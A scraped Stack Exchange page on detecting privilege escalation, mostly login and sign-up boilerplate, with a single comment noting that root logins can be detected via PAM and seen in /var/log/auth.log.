- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f76766%2fprivilege-escalation-detection%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
A machine can detect when root logs in thanks to
pam
(the authentication module). Have a look at/var/log/auth.log
for example.– lgeorget
May 23 '13 at 4:04